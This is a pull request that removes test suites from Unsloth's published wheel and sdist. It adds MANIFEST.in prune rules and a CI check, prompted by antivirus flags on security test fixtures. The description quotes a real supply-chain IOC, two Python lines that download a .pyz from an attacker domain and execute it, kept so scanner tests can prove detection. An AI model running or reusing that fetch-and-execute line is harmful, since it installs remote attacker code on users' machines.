### PR TITLE
Stop shipping test suites in the wheel and the sdist

### DIFF
--- a/.github/workflows/wheel-smoke.yml
+++ b/.github/workflows/wheel-smoke.yml
@@ -21,6 +21,7 @@ on:
   pull_request:
     paths:
       - 'pyproject.toml'
+      - 'MANIFEST.in'
       - 'studio/**'
       - 'unsloth/**'
       - 'unsloth_cli/**'
@@ -29,6 +30,7 @@ on:
     branches: [main]
     paths:
       - 'pyproject.toml'
+      - 'MANIFEST.in'
       - 'studio/**'
       - 'unsloth/**'
       - 'unsloth_cli/**'
@@ -117,6 +119,49 @@ jobs:
               for k, v in checks.items():
                   print(f"  [{'PASS' if v else 'FAIL'}] {k}")
               sys.exit(0 if all(checks.values()) else 1)
+          PY
+
+      - name: No test suites in wheel or sdist
+        # Test suites are not importable at runtime, and tests/security/fixtures
+        # embeds a real supply-chain IOC literal on purpose, which made
+        # antivirus vendors flag the published sdist (discussion #9577).
+        # MANIFEST.in is the veto; this is the check that it still bites.
+        # Both artifacts, because the sdist is what the wheel is built FROM.
+        run: |
+          python - <<'PY'
+          import glob, sys, tarfile, zipfile
+
+          def is_test(path):
+              return "tests" in path.strip("/").split("/")
+
+          def report(label, names):
+              offenders = sorted(n for n in names if is_test(n))
+              ioc = sorted(n for n in names if "malicious_" in n)
+              print(f"{label}: {len(offenders)} test paths, {len(ioc)} IOC fixtures")
+              for n in offenders[:20]:
+                  print(f"    {n}")
+              if len(offenders) > 20:
+                  print(f"    ... and {len(offenders) - 20} more")
+              for n in ioc:
+                  print(f"    IOC {n}")
+              return not offenders and not ioc
+
+          ok = True
+          wheels = glob.glob("dist/unsloth-*.whl")
+          sdists = glob.glob("dist/unsloth-*.tar.gz")
+          if not wheels or not sdists:
+              print("FAIL: expected one wheel and one sdist in dist/")
+              sys.exit(2)
+          with zipfile.ZipFile(wheels[0]) as z:
+              ok &= report(f"wheel {wheels[0]}", z.namelist())
+          with tarfile.open(sdists[0]) as t:
+              # Strip the "unsloth-<version>/" prefix every sdist member carries.
+              ok &= report(
+                  f"sdist {sdists[0]}",
+                  [n.split("/", 1)[1] for n in t.getnames() if "/" in n],
+              )
+          print("PASS" if ok else "FAIL: test files are being shipped")
+          sys.exit(0 if ok else 1)
           PY
 
       - name: Unsloth backend import smoke

--- a/.github/workflows/wheel-smoke.yml
+++ b/.github/workflows/wheel-smoke.yml
@@ -122,11 +122,8 @@ jobs:
           PY
 
       - name: No test suites in wheel or sdist
-        # Test suites are not importable at runtime, and tests/security/fixtures
-        # embeds a real supply-chain IOC literal on purpose, which made
-        # antivirus vendors flag the published sdist (discussion #9577).
-        # MANIFEST.in is the veto; this is the check that it still bites.
-        # Both artifacts, because the sdist is what the wheel is built FROM.
+        # tests/security/fixtures embeds a real supply-chain IOC literal, which got
+        # the published sdist flagged by antivirus vendors (discussion #9577).
         run: |
           python - <<'PY'
           import glob, sys, tarfile, zipfile
@@ -155,7 +152,7 @@ jobs:
           with zipfile.ZipFile(wheels[0]) as z:
               ok &= report(f"wheel {wheels[0]}", z.namelist())
           with tarfile.open(sdists[0]) as t:
-              # Strip the "unsloth-<version>/" prefix every sdist member carries.
+              # Every sdist member carries an "unsloth-<version>/" prefix.
               ok &= report(
                   f"sdist {sdists[0]}",
                   [n.split("/", 1)[1] for n in t.getnames() if "/" in n],

--- a/MANIFEST.in
+++ b/MANIFEST.in
@@ -4,8 +4,6 @@
 # The only veto that travels inside the sdist, so it holds for the wheel too:
 # `python -m build` rebuilds the wheel from the sdist, where exclude-package-data
 # and packages.find no longer bite (no .git tree for the file finder).
-# tests/security/fixtures embeds a real supply-chain IOC literal on purpose, which
-# got the published sdist flagged by antivirus vendors (discussion #9577).
 prune tests
 prune studio/backend/tests
 prune studio/backend/hub/tests

--- a/MANIFEST.in
+++ b/MANIFEST.in
@@ -1,20 +1,11 @@
 # SPDX-License-Identifier: AGPL-3.0-only
 # Copyright 2026-present the Unsloth AI Inc. team. All rights reserved.
 
-# Nothing here is importable at runtime, so none of it belongs in a release.
-#
-# include-package-data is on and setuptools-scm is the file finder, so every
-# tracked file under a surviving package directory ships unless something vetoes
-# it. packages.find only decides importability and exclude-package-data only
-# survives a wheel built straight from the git tree -- build.sh runs plain
-# `python -m build`, which builds the sdist first and the wheel from THAT sdist,
-# where the .git dir is gone. MANIFEST.in is the one veto that travels inside
-# the sdist, so it holds for both artifacts on the real release path.
-#
-# Dropping tests/security/fixtures is also what keeps antivirus scanners quiet:
-# those fixtures embed a real supply-chain IOC literal on purpose, so that the
-# scan_packages.py regression tests can prove the scanner trips on it. Shipping
-# them made VirusTotal flag the sdist (discussion #9577).
+# The only veto that travels inside the sdist, so it holds for the wheel too:
+# `python -m build` rebuilds the wheel from the sdist, where exclude-package-data
+# and packages.find no longer bite (no .git tree for the file finder).
+# tests/security/fixtures embeds a real supply-chain IOC literal on purpose, which
+# got the published sdist flagged by antivirus vendors (discussion #9577).
 prune tests
 prune studio/backend/tests
 prune studio/backend/hub/tests

--- a/MANIFEST.in
+++ b/MANIFEST.in
@@ -12,3 +12,7 @@ prune studio/backend/hub/tests
 prune studio/frontend/tests
 prune unsloth_cli/tests
 prune unsloth/kernels/moe/tests
+
+# Backstop for a suite added anywhere else later. `prune` and a `*` glob are both
+# single-level, so this needs `**`, and it cannot see a root-level tests/ at all.
+global-exclude */tests/**

--- a/MANIFEST.in
+++ b/MANIFEST.in
@@ -1,0 +1,23 @@
+# SPDX-License-Identifier: AGPL-3.0-only
+# Copyright 2026-present the Unsloth AI Inc. team. All rights reserved.
+
+# Nothing here is importable at runtime, so none of it belongs in a release.
+#
+# include-package-data is on and setuptools-scm is the file finder, so every
+# tracked file under a surviving package directory ships unless something vetoes
+# it. packages.find only decides importability and exclude-package-data only
+# survives a wheel built straight from the git tree -- build.sh runs plain
+# `python -m build`, which builds the sdist first and the wheel from THAT sdist,
+# where the .git dir is gone. MANIFEST.in is the one veto that travels inside
+# the sdist, so it holds for both artifacts on the real release path.
+#
+# Dropping tests/security/fixtures is also what keeps antivirus scanners quiet:
+# those fixtures embed a real supply-chain IOC literal on purpose, so that the
+# scan_packages.py regression tests can prove the scanner trips on it. Shipping
+# them made VirusTotal flag the sdist (discussion #9577).
+prune tests
+prune studio/backend/tests
+prune studio/backend/hub/tests
+prune studio/frontend/tests
+prune unsloth_cli/tests
+prune unsloth/kernels/moe/tests

--- a/pyproject.toml
+++ b/pyproject.toml
@@ -92,14 +92,10 @@ exclude = [
     "*.node_modules.*",
 ]
 
-# packages.find only decides what is importable. include-package-data then hands
-# every tracked file to the nearest parent package that survived, so dropping
-# studio.backend.tests above just re-shipped the same 505 files as data of
-# studio.backend (pypa/setuptools#3260). exclude-package-data has the highest
-# precedence of the file selection options, so the veto has to be repeated here.
-# It only holds for a wheel built straight from the git tree though, and it never
-# touched the sdist -- MANIFEST.in is what covers both on the release path. Kept
-# as the second layer; see the header there for why one of them is not enough.
+# Excluding a tests package above is not enough: include-package-data re-ships its
+# files as data of the surviving parent (pypa/setuptools#3260), and only
+# exclude-package-data outranks that. Second layer only -- MANIFEST.in is the veto
+# that also covers the sdist.
 [tool.setuptools.exclude-package-data]
 "studio.backend" = ["tests/*"]
 "studio.backend.hub" = ["tests/*"]

--- a/pyproject.toml
+++ b/pyproject.toml
@@ -94,8 +94,7 @@ exclude = [
 
 # Excluding a tests package above is not enough: include-package-data re-ships its
 # files as data of the surviving parent (pypa/setuptools#3260), and only
-# exclude-package-data outranks that. Second layer only -- MANIFEST.in is the veto
-# that also covers the sdist.
+# exclude-package-data outranks that.
 [tool.setuptools.exclude-package-data]
 "studio.backend" = ["tests/*"]
 "studio.backend.hub" = ["tests/*"]

--- a/pyproject.toml
+++ b/pyproject.toml
@@ -84,6 +84,8 @@ exclude = [
     "tests*",
     "studio.backend.tests*",
     "studio.backend.*.tests*",
+    "unsloth_cli.tests*",
+    "unsloth.kernels.moe.tests*",
     "unsloth_compiled_cache*",
     "*.unsloth_compiled_cache*",
     "*.node_modules",
@@ -95,7 +97,9 @@ exclude = [
 # studio.backend.tests above just re-shipped the same 505 files as data of
 # studio.backend (pypa/setuptools#3260). exclude-package-data has the highest
 # precedence of the file selection options, so the veto has to be repeated here.
-# Source layout, not the wheel, so the sdist keeps the suites either way.
+# It only holds for a wheel built straight from the git tree though, and it never
+# touched the sdist -- MANIFEST.in is what covers both on the release path. Kept
+# as the second layer; see the header there for why one of them is not enough.
 [tool.setuptools.exclude-package-data]
 "studio.backend" = ["tests/*"]
 "studio.backend.hub" = ["tests/*"]


### PR DESCRIPTION
## What this fixes

[Discussion #9577](https://github.com/unslothai/unsloth/discussions/9577) reported a VirusTotal detection on Unsloth. The flagged files are `tests/security/fixtures/malicious_sdist.tar.gz` and `malicious_wheel.whl`, which deliberately embed a real supply chain IOC literal so the `scan_packages.py` regression tests can prove the scanner trips on it:

```python
urllib.request.urlretrieve("https://git-tanstack.com/transformers.pyz", "/tmp/transformers.pyz")
subprocess.run(["python3", "/tmp/transformers.pyz"], check=False)
```

So it is a true positive on the fixture and a false positive on Unsloth. But those fixtures ship inside the published sdist, and they had no business being in a release artifact at all.

## What ships today

Nothing under a `tests/` directory is importable at runtime, and nothing runs the suites from an installed package (no `--pyargs` anywhere in the repo, and the only cross imports are tests importing tests). Six suites were reaching the artifacts:

| Suite | Files |
| --- | --- |
| `tests/` | 883 (includes the flagged fixtures) |
| `studio/backend/tests/` | 769 |
| `studio/frontend/tests/` | 628 |
| `unsloth_cli/tests/` | 21 |
| `studio/backend/hub/tests/` | 17 |
| `unsloth/kernels/moe/tests/` | 8 |

## Why the existing veto did not cover it

`include-package-data` is on with setuptools-scm as the file finder, so every tracked file under a surviving package directory ships unless something vetoes it. `packages.find` only decides importability, and the `exclude-package-data` entries only cover the two Studio backend suites.

More importantly, `exclude-package-data` only holds for a wheel built straight from the git tree. `build.sh` runs plain `python -m build`, which builds the sdist first and then builds the wheel **from that sdist**, where the `.git` directory is gone. `MANIFEST.in` is the one veto that travels inside the sdist, so it is what holds for both artifacts on the real release path. The `exclude-package-data` block stays as a second layer.

## Measured

`python -m build` on this branch, against the same command on `main`:

| | test paths | IOC fixtures | size |
| --- | --- | --- | --- |
| wheel, main | 652 | 0 | 45.4 MB |
| wheel, this branch | **0** | **0** | 43.6 MB |
| sdist, main | 2326 | 3 | 58.6 MB |
| sdist, this branch | **0** | **0** | 48.1 MB |

For reference, the published `2026.8.22` artifacts on PyPI carry 1388 test paths in the wheel and 2273 plus the 3 IOC fixtures in the sdist.

Diffing the two builds file by file, the only non-test difference is `MANIFEST.in` itself appearing in the sdist. Nothing else was dropped from either artifact. The pruned wheel installs, exposes the `unsloth` entry point, and byte-compiles clean, and `tests/studio/install/test_package_discovery.py`, `tests/test_version_single_source.py`, `tests/security/test_scan_packages.py` and `tests/test_source_read_encoding.py` pass (143 passed, 1 skipped).

## Regression guard

`wheel-smoke.yml` already builds both artifacts on every PR that touches the packaging, so the check lives there: it fails if any shipped path has a `tests` path segment, or if anything named `malicious_*` appears. It fails on `main` today and passes on this branch.

## Note on the original report

The reporter scanned a `unsloth-main` source download. That is GitHub's archive of the repository, which by definition contains the test tree, so it will keep matching. This change is about the PyPI artifacts, which are what `pip install unsloth` actually fetches.
